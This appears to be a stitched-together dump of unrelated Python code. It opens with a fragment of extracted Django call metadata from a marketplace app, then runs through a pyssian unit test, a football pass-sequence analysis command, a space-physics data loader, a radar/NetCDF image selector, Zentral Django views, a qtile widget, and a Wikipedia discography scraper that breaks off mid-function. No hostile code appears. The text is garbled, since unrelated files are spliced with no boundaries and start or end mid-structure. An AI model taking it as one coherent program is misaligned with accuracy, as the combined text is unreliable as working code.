Tankyou')\n", (20203, 20275), False, 'from django.contrib import messages\n'), ((20287, 20330), 'django.shortcuts.redirect', 'redirect', (['"""transport_product_detail"""'], {'pk': 'pk'}), "('transport_product_detail', pk=pk)\n", (20295, 20330), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((20385, 20435), 'django.shortcuts.render', 'render', (['request', '"""transport_details.html"""', 'context'], {}), "(request, 'transport_details.html', context)\n", (20391, 20435), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((844, 912), 'django.contrib.messages.success', 'messages.success', (['request', '"""You Have Sucessfully Added new Product """'], {}), "(request, 'You Have Sucessfully Added new Product ')\n", (860, 912), False, 'from django.contrib import messages\n'), ((932, 976), 'django.shortcuts.render', 'render', (['request', '"""product_add.html"""', 'context'], {}), "(request, 'product_add.html', context)\n", (938, 976), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((1179, 1223), 'django.shortcuts.render', 'render', (['request', '"""product_add.html"""', 'context'], {}), "(request, 'product_add.html', context)\n", (1185, 1223), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((1390, 1434), 'django.shortcuts.render', 'render', (['request', '"""product_add.html"""', 'context'], {}), "(request, 'product_add.html', context)\n", (1396, 1434), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((1466, 1486), 'django.shortcuts.redirect', 'redirect', (['"""homepage"""'], {}), "('homepage')\n", (1474, 1486), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((2123, 2148), 'django.shortcuts.redirect', 'redirect', (['"""user_products"""'], {}), "('user_products')\n", (2131, 2148), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((2333, 2380), 
'django.shortcuts.render', 'render', (['request', '"""product_update.html"""', 'context'], {}), "(request, 'product_update.html', context)\n", (2339, 2380), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((2965, 3025), 'django.contrib.messages.success', 'messages.success', (['request', '"""Transport Updated Sucessfully !"""'], {}), "(request, 'Transport Updated Sucessfully !')\n", (2981, 3025), False, 'from django.contrib import messages\n'), ((3045, 3070), 'django.shortcuts.redirect', 'redirect', (['"""user_products"""'], {}), "('user_products')\n", (3053, 3070), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((3247, 3296), 'django.shortcuts.render', 'render', (['request', '"""transport_update.html"""', 'context'], {}), "(request, 'transport_update.html', context)\n", (3253, 3296), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((3767, 3836), 'django.contrib.messages.success', 'messages.success', (['request', '"""Your Message Have Been Sucssusfuly Sent """'], {}), "(request, 'Your Message Have Been Sucssusfuly Sent ')\n", (3783, 3836), False, 'from django.contrib import messages\n'), ((3884, 3905), 'django.shortcuts.redirect', 'redirect', (['"""contactus"""'], {}), "('contactus')\n", (3892, 3905), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((3993, 4053), 'django.contrib.messages.error', 'messages.error', (['request', '"""Your Message Have Not Been Sent """'], {}), "(request, 'Your Message Have Not Been Sent ')\n", (4007, 4053), False, 'from django.contrib import messages\n'), ((4170, 4210), 'django.shortcuts.render', 'render', (['request', '"""contact.html"""', 'context'], {}), "(request, 'contact.html', context)\n", (4176, 4210), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((6009, 6054), 'django.shortcuts.render', 'render', (['request', '"""userproducts.html"""', 'context'], {}), "(request, 
'userproducts.html', context)\n", (6015, 6054), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((6986, 7036), 'django.contrib.messages.success', 'messages.success', (['request', '"""New Catagory Added ! """'], {}), "(request, 'New Catagory Added ! ')\n", (7002, 7036), False, 'from django.contrib import messages\n'), ((7058, 7084), 'django.shortcuts.redirect', 'redirect', (['"""create_product"""'], {}), "('create_product')\n", (7066, 7084), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((7115, 7163), 'django.contrib.messages.success', 'messages.success', (['request', '"""Invalid Catagory ! """'], {}), "(request, 'Invalid Catagory ! ')\n", (7131, 7163), False, 'from django.contrib import messages\n'), ((7185, 7211), 'django.shortcuts.redirect', 'redirect', (['"""create_product"""'], {}), "('create_product')\n", (7193, 7211), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((7846, 7906), 'django.contrib.messages.success', 'messages.success', (['request', '"""You Have Sucessfully Commented """'], {}), "(request, 'You Have Sucessfully Commented ')\n", (7862, 7906), False, 'from django.contrib import messages\n'), ((7925, 8066), 'django.shortcuts.render', 'render', (['request', '"""product_detail_view.html"""'], {'context': "{'item': item, 'comment': commentes, 'com ': com, 'form': form1, 'la': la,\n 'lo': lo}"}), "(request, 'product_detail_view.html', context={'item': item,\n 'comment': commentes, 'com ': com, 'form': form1, 'la': la, 'lo': lo})\n", (7931, 8066), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((8075, 8123), 'django.contrib.messages.success', 'messages.success', (['request', '"""Unable To Comment! """'], {}), "(request, 'Unable To Comment! 
')\n", (8091, 8123), False, 'from django.contrib import messages\n'), ((8142, 8283), 'django.shortcuts.render', 'render', (['request', '"""product_detail_view.html"""'], {'context': "{'item': item, 'com ': com, 'comment': commentes, 'form': form1, 'la': la,\n 'lo': lo}"}), "(request, 'product_detail_view.html', context={'item': item, 'com ':\n com, 'comment': commentes, 'form': form1, 'la': la, 'lo': lo})\n", (8148, 8283), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((9291, 9394), 'django.core.mail.send_mail', 'send_mail', (['"""Hello From Drims Team"""', 'body1', '"""With Regards Drims Team"""', '[email]'], {'fail_silently': '(False)'}), "('Hello From Drims Team', body1, 'With Regards Drims Team', [email\n ], fail_silently=False)\n", (9300, 9394), False, 'from django.core.mail import send_mail\n'), ((11240, 11343), 'django.core.mail.send_mail', 'send_mail', (['"""Hello From Drims Team"""', 'body1', '"""With Regards Drims Team"""', '[email]'], {'fail_silently': '(False)'}), "('Hello From Drims Team', body1, 'With Regards Drims Team', [email\n ], fail_silently=False)\n", (11249, 11343), False, 'from django.core.mail import send_mail\n'), ((11497, 11600), 'django.core.mail.send_mail', 'send_mail', (['"""Hello From Drims Team"""', 'body2', '"""With Regards Drims Team"""', '[email]'], {'fail_silently': '(False)'}), "('Hello From Drims Team', body2, 'With Regards Drims Team', [email\n ], fail_silently=False)\n", (11506, 11600), False, 'from django.core.mail import send_mail\n'), ((12691, 12794), 'django.core.mail.send_mail', 'send_mail', (['"""Hello From Drims Team"""', 'body1', '"""With Regards Drims Team"""', '[email]'], {'fail_silently': '(False)'}), "('Hello From Drims Team', body1, 'With Regards Drims Team', [email\n ], fail_silently=False)\n", (12700, 12794), False, 'from django.core.mail import send_mail\n'), ((13712, 13789), 'django.core.mail.send_mail', 'send_mail', (['"""Hello From Drims Team"""', 'body1', '"""With Regards 
Drims Team"""', '[email]'], {}), "('Hello From Drims Team', body1, 'With Regards Drims Team', [email])\n", (13721, 13789), False, 'from django.core.mail import send_mail\n'), ((18594, 18679), 'django.contrib.messages.success', 'messages.success', (['request', '"""You Have Sucessfully Added Product To Wanted List """'], {}), "(request, 'You Have Sucessfully Added Product To Wanted List '\n )\n", (18610, 18679), False, 'from django.contrib import messages\n'), ((18694, 18741), 'django.shortcuts.render', 'render', (['request', '"""wanted_product.html"""', 'context'], {}), "(request, 'wanted_product.html', context)\n", (18700, 18741), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((18915, 18962), 'django.shortcuts.render', 'render', (['request', '"""wanted_product.html"""', 'context'], {}), "(request, 'wanted_product.html', context)\n", (18921, 18962), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((19368, 19441), 'django.contrib.messages.success', 'messages.success', (['request', '"""You Have Sucessfully Added Transport Options"""'], {}), "(request, 'You Have Sucessfully Added Transport Options')\n", (19384, 19441), False, 'from django.contrib import messages\n'), ((19461, 19486), 'django.shortcuts.redirect', 'redirect', (['"""transport_add"""'], {}), "('transport_add')\n", (19469, 19486), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((19513, 19582), 'django.contrib.messages.success', 'messages.success', (['request', '"""You Please Provide Valid Information !!!"""'], {}), "(request, 'You Please Provide Valid Information !!!')\n", (19529, 19582), False, 'from django.contrib import messages\n'), ((19602, 19627), 'django.shortcuts.redirect', 'redirect', (['"""transport_add"""'], {}), "('transport_add')\n", (19610, 19627), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((6434, 6486), 'django.shortcuts.render', 'render', (['request', 
'"""price_teller_orders.html"""', 'context'], {}), "(request, 'price_teller_orders.html', context)\n", (6440, 6486), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((6689, 6734), 'django.shortcuts.render', 'render', (['request', '"""buyer_orders.html"""', 'context'], {}), "(request, 'buyer_orders.html', context)\n", (6695, 6734), False, 'from django.shortcuts import render, redirect, get_object_or_404\n'), ((6760, 6780), 'django.shortcuts.redirect', 'redirect', (['"""homepage"""'], {}), "('homepage')\n", (6768, 6780), False, 'from django.shortcuts import render, redirect, get_object_or_404\n')] |
from pyssian.chemistryutils import is_basis,is_method
import unittest
class ChemistryUtilsTest(unittest.TestCase):
    """Exercise is_basis/is_method against curated valid, fake and keyword tokens."""

    def setUp(self):
        # Each "Fake" list holds near-miss spellings of the corresponding valid tokens.
        self.Valid_Basis = '6-311+g(d,p) 6-31g* cc-pVTZ D95V* LanL2DZ SDD28 Def2SVP UGBS2P2++'.split()
        self.Fake_Basis = '6-311g+(d,p) 6-31*g ccpVTZ D96V* LanL2TZ SDD Def2SP UGBS2++P2'.split()
        self.Valid_Methods = 'ub3lyp mp2 casscf ccsd(t) rm062x WB97XD pbepbe'.split()
        self.Fake_Methods = 'bu3lyp pm2 bw97xd m06-2x pbepbe0'.split()
        self.Usual_Keywords = 'opt freq scrf scf #p calcfc empiricaldispersion'.split()

    def test_valid_isbasis(self):
        """Every curated valid basis token must be accepted."""
        msg = 'Valid basis not properly recognized'
        for token in self.Valid_Basis:
            self.assertTrue(is_basis(token), msg)

    def test_fake_isbasis(self):
        """Near-miss basis spellings must be rejected."""
        msg = 'Fake basis recognized as valid'
        for token in self.Fake_Basis:
            self.assertFalse(is_basis(token), msg)

    def test_valid_ismethod(self):
        """Every curated valid method token must be accepted."""
        msg = 'Valid method not properly recognized'
        for token in self.Valid_Methods:
            self.assertTrue(is_method(token), msg)

    def test_fake_ismethod(self):
        """Near-miss method spellings must be rejected."""
        msg = 'Fake method recognized as valid'
        for token in self.Fake_Methods:
            self.assertFalse(is_method(token), msg)

    def test_usual_keywords(self):
        """Route-section keywords must be neither a basis nor a method."""
        msg1 = 'Keyword recognized as basis'
        msg2 = 'Keyword recognized as method'
        for keyword in self.Usual_Keywords:
            self.assertFalse(is_basis(keyword), msg1)
            self.assertFalse(is_method(keyword), msg2)
| [
"pyssian.chemistryutils.is_method",
"pyssian.chemistryutils.is_basis"
] | [((736, 751), 'pyssian.chemistryutils.is_basis', 'is_basis', (['valid'], {}), '(valid)\n', (744, 751), False, 'from pyssian.chemistryutils import is_basis, is_method\n'), ((903, 917), 'pyssian.chemistryutils.is_basis', 'is_basis', (['fake'], {}), '(fake)\n', (911, 917), False, 'from pyssian.chemistryutils import is_basis, is_method\n'), ((1080, 1096), 'pyssian.chemistryutils.is_method', 'is_method', (['valid'], {}), '(valid)\n', (1089, 1096), False, 'from pyssian.chemistryutils import is_basis, is_method\n'), ((1252, 1267), 'pyssian.chemistryutils.is_method', 'is_method', (['fake'], {}), '(fake)\n', (1261, 1267), False, 'from pyssian.chemistryutils import is_basis, is_method\n'), ((1472, 1489), 'pyssian.chemistryutils.is_basis', 'is_basis', (['keyword'], {}), '(keyword)\n', (1480, 1489), False, 'from pyssian.chemistryutils import is_basis, is_method\n'), ((1525, 1543), 'pyssian.chemistryutils.is_method', 'is_method', (['keyword'], {}), '(keyword)\n', (1534, 1543), False, 'from pyssian.chemistryutils import is_basis, is_method\n')] |
"""
Objectives:
- Which players pass together the most?
- What types of position combintations are most frequent in pass-sequences?
"""
"""
Sample Run Script: python manage.py analysis3 --team_uuid="t1326"
--print_to_csv
python manage.py analysis4 --team_uuid="t1326" --start_date="2016-07-01"
python manage.py analysis4 --team_uuid="t1326" --start_date="2016-01-01" --end_date="2016-07-01"
"""
import datetime
import csv
import os
import time
from django.core.management.base import BaseCommand, CommandError
from eventstatistics.models import EventStatistic
from qualifiers.models import Qualifier
from games.models import Game
from lineups.models import Lineup
from players.models import Player
from playerstatistics.models import PlayerStatistic
from salaries.models import Salary
from statistictypes.models import StatisticType
from teams.models import Team
from teamstatistics.models import TeamStatistic
from venues.models import Venue
import utils.analysis as ua
import utils.f24_analysis as uf24
class Command(BaseCommand):
    """Trace the pass sequences that end in shots for one team.

    For every game the team played inside the requested date range, identify
    the shots, backtrack the chain of events leading to each one, and parse
    the reconstructed sequence.
    """
    help = 'Pull the statistics of a team across a time-range; classify by outcome'

    def add_arguments(self, parser):
        """Register the CLI options for this management command."""
        parser.add_argument(
            "--team_uuid",
            dest="team_uuid",
            default="",
            help="Desired Opta team ID",  # typo fix: was "Desried"
        )
        parser.add_argument(
            "--print_to_csv",
            action="store_true",
            dest="print_to_csv",
            default=False,
            help="save file?",
        )
        parser.add_argument(
            "--start_date",
            dest="start_date",
            default='1900-01-01',
            help="Example format: 1900-01-31",
        )
        parser.add_argument(
            "--end_date",
            dest="end_date",
            default='2900-01-01',
            help="Example format: 1900-01-31",
        )

    def handle(self, *args, **options):
        """Entry point: validate the options, then analyze every game in range."""
        if not options["team_uuid"]:
            # CommandError (already imported above) is the idiomatic way for a
            # management command to abort; it is still an Exception subclass.
            raise CommandError("Opta team ID is needed")
        arg_team_uuid = str(options["team_uuid"])
        arg_start_date = datetime.datetime.strptime(str(options["start_date"]), "%Y-%m-%d")
        arg_end_date = datetime.datetime.strptime(str(options["end_date"]), "%Y-%m-%d")
        # NOTE(review): --print_to_csv is accepted but not used anywhere yet.

        # Resolve the team, then every game it played inside the window.
        db_team = Team.objects.get(uuid=arg_team_uuid)
        team_games = ua.team_list_games(db_team, arg_start_date, arg_end_date)

        for game in team_games:
            for shot in uf24.identify_shots(game, db_team):
                # Reconstruct the event chain that preceded the shot, then
                # parse/report it.
                backtracked = uf24.backtrack(shot)
                uf24.parse_backtrack(shot, backtracked)
# print "end: parse backtrack"
| [
"utils.f24_analysis.backtrack",
"utils.analysis.team_list_games",
"datetime.datetime.strptime",
"teams.models.Team.objects.get",
"utils.f24_analysis.parse_backtrack",
"utils.f24_analysis.identify_shots"
] | [((2198, 2252), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['arg_start_date', '"""%Y-%m-%d"""'], {}), "(arg_start_date, '%Y-%m-%d')\n", (2224, 2252), False, 'import datetime\n'), ((2270, 2322), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['arg_end_date', '"""%Y-%m-%d"""'], {}), "(arg_end_date, '%Y-%m-%d')\n", (2296, 2322), False, 'import datetime\n'), ((2349, 2385), 'teams.models.Team.objects.get', 'Team.objects.get', ([], {'uuid': 'arg_team_uuid'}), '(uuid=arg_team_uuid)\n', (2365, 2385), False, 'from teams.models import Team\n'), ((2441, 2498), 'utils.analysis.team_list_games', 'ua.team_list_games', (['db_team', 'arg_start_date', 'arg_end_date'], {}), '(db_team, arg_start_date, arg_end_date)\n', (2459, 2498), True, 'import utils.analysis as ua\n'), ((2613, 2647), 'utils.f24_analysis.identify_shots', 'uf24.identify_shots', (['game', 'db_team'], {}), '(game, db_team)\n', (2632, 2647), True, 'import utils.f24_analysis as uf24\n'), ((2745, 2765), 'utils.f24_analysis.backtrack', 'uf24.backtrack', (['item'], {}), '(item)\n', (2759, 2765), True, 'import utils.f24_analysis as uf24\n'), ((2901, 2940), 'utils.f24_analysis.parse_backtrack', 'uf24.parse_backtrack', (['item', 'backtracked'], {}), '(item, backtracked)\n', (2921, 2940), True, 'import utils.f24_analysis as uf24\n')] |
#!/usr/bin/env ipython
import numpy as np
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
class gral():
    """Generic empty container ("general"): attributes are attached ad hoc."""
    def __init__(self):
        # Start with an empty identifier; callers bolt on .data, .t, .avr, etc.
        self.name = ''
# Namespace containers: sheath (sh), magnetic cloud (mc) and cosmic rays (cr).
sh, mc = gral(), gral()
cr = gral()
cr.sh, cr.mc = gral(), gral()
# Speed window bounds used to select the event set (units not stated here).
vlo, vhi = 550.0, 3000.0 #550., 3000. #100.0, 450.0 #550.0, 3000.0
dir_inp_sh = '../../../sheaths/ascii/MCflag2/wShiftCorr/_test_Vmc_'
dir_inp_mc = '../../../mcs/ascii/MCflag2/wShiftCorr/_test_Vmc_'
# Common filename stem encoding the selection parameters (vlo/vhi baked in).
fname_inp_part = 'MCflag2_2before.4after_fgap0.2_Wang90.0_vlo.%4.1f.vhi.%4.1f' % (vlo, vhi)
fname_sh = dir_inp_sh + '/%s_V.txt' % fname_inp_part
fname_mc = dir_inp_mc + '/%s_V.txt' % fname_inp_part
# Load the "_V" files; transpose so each file column becomes a row.
sh.data = np.loadtxt(fname_sh).T
mc.data = np.loadtxt(fname_mc).T
# Row 0 is treated as the time axis, row 2 as the average profile (avr).
sh.t, sh.avr = sh.data[0], sh.data[2]
mc.t, mc.avr = mc.data[0], mc.data[2]
#++++++++++++++++++++++++++++++++++++++++++++++++++++
# Same layout for the cosmic-ray ("_CRs") files.
fname_sh = dir_inp_sh + '/%s_CRs.txt' % fname_inp_part
fname_mc = dir_inp_mc + '/%s_CRs.txt' % fname_inp_part
cr.sh.data = np.loadtxt(fname_sh).T
cr.mc.data = np.loadtxt(fname_mc).T
cr.sh.t, cr.sh.avr = cr.sh.data[0], cr.sh.data[2]
cr.mc.t, cr.mc.avr = cr.mc.data[0], cr.mc.data[2]
| [
"numpy.loadtxt"
] | [((687, 707), 'numpy.loadtxt', 'np.loadtxt', (['fname_sh'], {}), '(fname_sh)\n', (697, 707), True, 'import numpy as np\n'), ((720, 740), 'numpy.loadtxt', 'np.loadtxt', (['fname_mc'], {}), '(fname_mc)\n', (730, 740), True, 'import numpy as np\n'), ((1005, 1025), 'numpy.loadtxt', 'np.loadtxt', (['fname_sh'], {}), '(fname_sh)\n', (1015, 1025), True, 'import numpy as np\n'), ((1041, 1061), 'numpy.loadtxt', 'np.loadtxt', (['fname_mc'], {}), '(fname_mc)\n', (1051, 1061), True, 'import numpy as np\n')] |
# Copyright 2018-2019 CRS4
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""\
Select radar images in the time range of each meteo sim.
Works on NetCDF datasets created with tdm grib2cf.
"""
import datetime
import argparse
import os
import sys
import tdm.radar.utils as utils
import cdo
basename = os.path.basename  # short aliases for frequently used helpers
join = os.path.join
strftime = datetime.datetime.strftime
strptime = datetime.datetime.strptime
FMT = "%Y-%m-%dT%H:%M:%S"  # timestamp format parsed from `cdo showtimestamp`
MODELS = frozenset(("bolam", "moloch"))  # meteo model names we recognize
# E.g., bolam_2018073001_6155f56b-40b1-4b9f-bad7-e785940b2076.nc
def get_paths(nc_dir):
    """Group the model NetCDF files found in nc_dir by run date ("YYYY-MM-DD")."""
    by_date = {}
    for entry in os.listdir(nc_dir):
        stem, ext = os.path.splitext(entry)
        if ext != ".nc":
            continue
        fields = stem.split("_")
        if fields[0] not in MODELS:
            continue
        # The run timestamp is normally the second field, but an "IFS" marker
        # shifts it to the third (e.g. bolam_IFS_2018073001_....nc).
        stamp = fields[1] if fields[1] != "IFS" else fields[2]
        run_date = strptime(stamp, "%Y%m%d%H").date()
        key = datetime.date.strftime(run_date, "%Y-%m-%d")
        by_date.setdefault(key, []).append(join(nc_dir, entry))
    return by_date
def get_dt_range(cdo_obj, nc):
    """Return (earliest, latest) timestamp present in the NetCDF dataset nc."""
    stamps = cdo_obj.showtimestamp(input=nc)[0].split()
    parsed = [strptime(s, FMT) for s in stamps]
    return min(parsed), max(parsed)
def main(args):
    """For each simulation date, copy the radar images whose timestamps fall
    inside that date's overall simulation time range into <out_dir>/<date>."""
    nc_paths = get_paths(args.sim_dir)
    c = cdo.Cdo()
    for date_str, nc_list in nc_paths.items():
        print("%s IN:" % date_str)
        # Collect the time range covered by every NetCDF file of this date.
        start_list, stop_list = [], []
        for nc in nc_list:
            start, stop = get_dt_range(c, nc)
            print("  %s (%s to %s)" % (basename(nc), start, stop))
            start_list.append(start)
            stop_list.append(stop)
        # Overall envelope of the per-file ranges.
        start, stop = min(start_list), max(stop_list)
        out_subd = join(args.out_dir, date_str)
        print("%s OUT:" % date_str)
        print("  %s (%s to %s)" % (date_str, start, stop))
        sys.stdout.flush()
        try:
            os.makedirs(out_subd)
        except FileExistsError:
            pass
        # Copy every radar image whose timestamp lies inside [start, stop].
        pairs = utils.get_images(args.radar_dir, after=start, before=stop)
        for dt, src in pairs:
            out_name = "%s.png" % strftime(dt, utils.FMT)
            dst = join(out_subd, out_name)
            with open(src, "rb") as fi, open(dst, "wb") as fo:
                fo.write(fi.read())
        print()
if __name__ == "__main__":
    # CLI: positional sim/radar dirs, optional output dir (defaults to CWD).
    parser = argparse.ArgumentParser(description=__doc__)
    parser.add_argument("sim_dir", metavar="NETCDF_SIM_DIR")
    parser.add_argument("radar_dir", metavar="PNG_RADAR_DIR")
    parser.add_argument("-o", "--out-dir", metavar="DIR", default=os.getcwd())
    main(parser.parse_args(sys.argv[1:]))
| [
"os.listdir",
"cdo.Cdo",
"argparse.ArgumentParser",
"os.makedirs",
"os.path.splitext",
"os.getcwd",
"tdm.radar.utils.get_images",
"sys.stdout.flush",
"datetime.date.strftime"
] | [((1097, 1115), 'os.listdir', 'os.listdir', (['nc_dir'], {}), '(nc_dir)\n', (1107, 1115), False, 'import os\n'), ((1775, 1784), 'cdo.Cdo', 'cdo.Cdo', ([], {}), '()\n', (1782, 1784), False, 'import cdo\n'), ((2801, 2845), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '__doc__'}), '(description=__doc__)\n', (2824, 2845), False, 'import argparse\n'), ((1136, 1158), 'os.path.splitext', 'os.path.splitext', (['name'], {}), '(name)\n', (1152, 1158), False, 'import os\n'), ((1430, 1470), 'datetime.date.strftime', 'datetime.date.strftime', (['date', '"""%Y-%m-%d"""'], {}), "(date, '%Y-%m-%d')\n", (1452, 1470), False, 'import datetime\n'), ((2323, 2341), 'sys.stdout.flush', 'sys.stdout.flush', ([], {}), '()\n', (2339, 2341), False, 'import sys\n'), ((2454, 2512), 'tdm.radar.utils.get_images', 'utils.get_images', (['args.radar_dir'], {'after': 'start', 'before': 'stop'}), '(args.radar_dir, after=start, before=stop)\n', (2470, 2512), True, 'import tdm.radar.utils as utils\n'), ((2367, 2388), 'os.makedirs', 'os.makedirs', (['out_subd'], {}), '(out_subd)\n', (2378, 2388), False, 'import os\n'), ((3035, 3046), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (3044, 3046), False, 'import os\n')] |
import logging
from django.apps import apps
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import Http404, HttpResponse, JsonResponse
from django.views.generic import TemplateView, View
from zentral.core.stores import frontend_store
logger = logging.getLogger("server.base.views")
class HealthCheckView(View):
    """Liveness probe: any GET is answered with a plain 200 'OK' body."""
    def get(self, request, *args, **kwargs):
        return HttpResponse('OK')
class IndexView(LoginRequiredMixin, TemplateView):
    """Landing page listing the Zentral apps that provide an events module."""
    template_name = "base/index.html"

    def get_context_data(self, **kwargs):
        context = super(IndexView, self).get_context_data(**kwargs)
        # Keep only apps that declare an events module, in alphabetical order.
        context["apps"] = sorted(
            name
            for name, config in apps.app_configs.items()
            if getattr(config, "events_module", None) is not None
        )
        return context
class AppHistogramDataView(LoginRequiredMixin, View):
    """JSON endpoint feeding the per-app event histogram chart.

    URL kwargs: ``app`` (zentral app name), ``interval`` (hour/day/week/month)
    and ``bucket_number`` (how many histogram buckets to aggregate).
    """
    # X-axis label format for each supported aggregation interval.
    INTERVAL_DATE_FORMAT = {
        "hour": "%H:%M",
        "day": "%d/%m",
        "week": "%d/%m",
        "month": "%m/%y",
    }

    def get(self, request, *args, **kwargs):
        app = kwargs['app']
        try:
            # The app must exist and expose an events module with a search dict.
            zentral_app = apps.app_configs[app]
            search_dict = getattr(zentral_app.events_module, "ALL_EVENTS_SEARCH_DICT")
        except (KeyError, AttributeError):
            raise Http404
        interval = kwargs["interval"]
        try:
            date_format = self.INTERVAL_DATE_FORMAT[interval]
        except KeyError:
            raise Http404
        # One label plus two series (event count, unique machine serial
        # numbers) per histogram bucket, pulled from the event store.
        labels = []
        event_count_data = []
        unique_msn_data = []
        for dt, event_count, unique_msn in frontend_store.get_app_hist_data(interval, int(kwargs["bucket_number"]),
                                                                            **search_dict):
            labels.append(dt.strftime(date_format))
            event_count_data.append(event_count)
            unique_msn_data.append(unique_msn)
        # Dataset payload shaped for the front-end chart (label, color, data).
        datasets = {"event_count": {
                        "label": "{} events".format(app),
                        "backgroundColor": "rgba(122, 182, 160, 0.7)",
                        "data": event_count_data
                    },
                    "unique_msn": {
                        "label": "{} machines".format(app),
                        "backgroundColor": "rgba(225, 100, 86, 0.7)",
                        "data": unique_msn_data
                    }}
        return JsonResponse({"app": app,
                             "labels": labels,
                             "datasets": datasets})
| [
"logging.getLogger",
"django.http.HttpResponse",
"django.apps.apps.app_configs.items",
"django.http.JsonResponse"
] | [((272, 310), 'logging.getLogger', 'logging.getLogger', (['"""server.base.views"""'], {}), "('server.base.views')\n", (289, 310), False, 'import logging\n'), ((402, 420), 'django.http.HttpResponse', 'HttpResponse', (['"""OK"""'], {}), "('OK')\n", (414, 420), False, 'from django.http import Http404, HttpResponse, JsonResponse\n'), ((681, 705), 'django.apps.apps.app_configs.items', 'apps.app_configs.items', ([], {}), '()\n', (703, 705), False, 'from django.apps import apps\n'), ((2473, 2539), 'django.http.JsonResponse', 'JsonResponse', (["{'app': app, 'labels': labels, 'datasets': datasets}"], {}), "({'app': app, 'labels': labels, 'datasets': datasets})\n", (2485, 2539), False, 'from django.http import Http404, HttpResponse, JsonResponse\n')] |
from libqtile.widget import base
from libqtile import bar, hook
__all__ = ['She']
class She(base._TextBox):
    """Widget displaying the Super Hybrid Engine status on eeepc computers.

    Depending on the ``format`` option it shows either the mode name or the
    corresponding CPU speed.
    """
    defaults = [
        ('device', '/sys/devices/platform/eeepc/cpufv', 'sys path to cpufv'),
        ('format', 'speed', 'Type of info to display "speed" or "name"'),
        ('update_delay', 0.5, 'Update Time in seconds.'),
    ]

    def __init__(self, width=bar.CALCULATED, **config):
        base._TextBox.__init__(self, 'CPU', **config)
        self.add_defaults(She.defaults)
        # Known cpufv register values mapped to human-readable mode info.
        self.modes = {
            '0x300': {'name': 'Performance', 'speed': '1.6GHz'},
            '0x301': {'name': 'Normal', 'speed': '1.2GHz'},
            # typo fix: was 'PoswerSave'
            '0x302': {'name': 'PowerSave', 'speed': '800MHz'}
        }
        # BUG FIX: the original `self.modes.keys().sort()` always produced
        # None (list.sort() sorts in place; dict views have no .sort() on
        # Python 3). Use sorted() to get the actual ordered key list.
        self.modes_index = sorted(self.modes)
        self.mode = None
        # Poll the sysfs file periodically.
        self.timeout_add(self.update_delay, self.update)

    def _get_mode(self):
        """Read and return the raw cpufv value (e.g. '0x300') from sysfs."""
        with open(self.device) as f:
            mode = f.read().strip()
        return mode

    def update(self):
        """Re-read the mode and redraw only on change; True keeps the timer alive."""
        if self.configured:
            mode = self._get_mode()
            if mode != self.mode:
                self.mode = mode
                self.draw()
        return True

    def draw(self):
        """Render the mode name or speed; fall back to the raw cpufv value."""
        if self.mode in self.modes:
            self.text = self.modes[self.mode][self.format]
        else:
            self.text = self.mode
        base._TextBox.draw(self)
| [
"libqtile.widget.base._TextBox.draw",
"libqtile.widget.base._TextBox.__init__"
] | [((536, 581), 'libqtile.widget.base._TextBox.__init__', 'base._TextBox.__init__', (['self', '"""CPU"""'], {}), "(self, 'CPU', **config)\n", (558, 581), False, 'from libqtile.widget import base\n'), ((1477, 1501), 'libqtile.widget.base._TextBox.draw', 'base._TextBox.draw', (['self'], {}), '(self)\n', (1495, 1501), False, 'from libqtile.widget import base\n')] |
import sys
import requests
from statistics import mean, stdev
from bs4 import BeautifulSoup
import matplotlib.pyplot as plt
class Disco():
    """Scrape an artist's Wikipedia discography and report track-length stats."""

    def __init__(self, artist):
        self.website_url = "https://en.wikipedia.org"
        disco_soup = self.get_disco_soup(artist)
        album_urls = self.get_album_urls(disco_soup)
        self.display_track_stats(artist, album_urls)

    def get_soup(self, url):
        """Fetch `url` and return the parsed BeautifulSoup document."""
        html = requests.get(url)
        soup = BeautifulSoup(html.content, "html.parser")
        return soup

    def get_disco_soup(self, artist):
        """Return the parsed '<artist>_discography' Wikipedia page."""
        artist = '_'.join(artist.split(' '))
        disco_url = "%s/wiki/%s_discography" % (self.website_url, artist)
        return self.get_soup(disco_url)

    def get_album_urls(self, disco_soup):
        """Collect album article URLs from the discography's first wikitable."""
        album_urls = []
        table = disco_soup.find("table", {"class": "wikitable plainrowheaders"})
        for th in table.find_all("th", {"scope": "row"}):
            album_urls.append(self.website_url + th.find("i").find("a")["href"])
        return album_urls

    def get_track_lengths(self, album_urls):
        """Map track title -> length in whole seconds across all albums."""
        track_lengths = {}
        for album_url in album_urls:
            album_soup = self.get_soup(album_url)
            songs = album_soup.find("table", {"class": "tracklist"})
            for row in songs.find_all("tr"):
                try:
                    title = row.find("td", {"style": "vertical-align:top"}).text
